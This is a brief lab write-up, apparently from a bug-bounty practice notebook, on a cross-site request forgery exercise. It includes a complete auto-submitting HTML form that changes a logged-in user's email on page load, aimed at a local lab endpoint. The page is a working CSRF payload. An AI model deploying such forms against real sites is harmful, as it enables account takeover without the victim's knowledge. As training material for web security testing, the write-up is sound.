CSRF 0x01

first we will login as jeremy

then try to change the email

grab the form post request

the script will post or update the email who is currenly login into the site

it will submit the value and change the email of that user

while the browser loads the website it will submit the payload and redirect the user to our localhost

<html>
<body>

<form action="http://localhost/labs/csrf0x01.php" method="post">
<input type="text" name="email" value="tryingcsrf@csrf.com" >
<button type="submit">Submit</button>
</form>


<script>
window.onload = function(){
	document.forms[0].submit();

}	

</script>

</body>
</html>

Then visit the link

file:///home/kali/bug-bounty/csrf1.html

As you can see it will be redirected to our localhost which will also update the email

Then the email is actually changed here automatically

Now we try with jessamy user

First login as jessamy

then visit the link

PreviousInsecure file upload 0x03NextCSRF 0x02

Last updated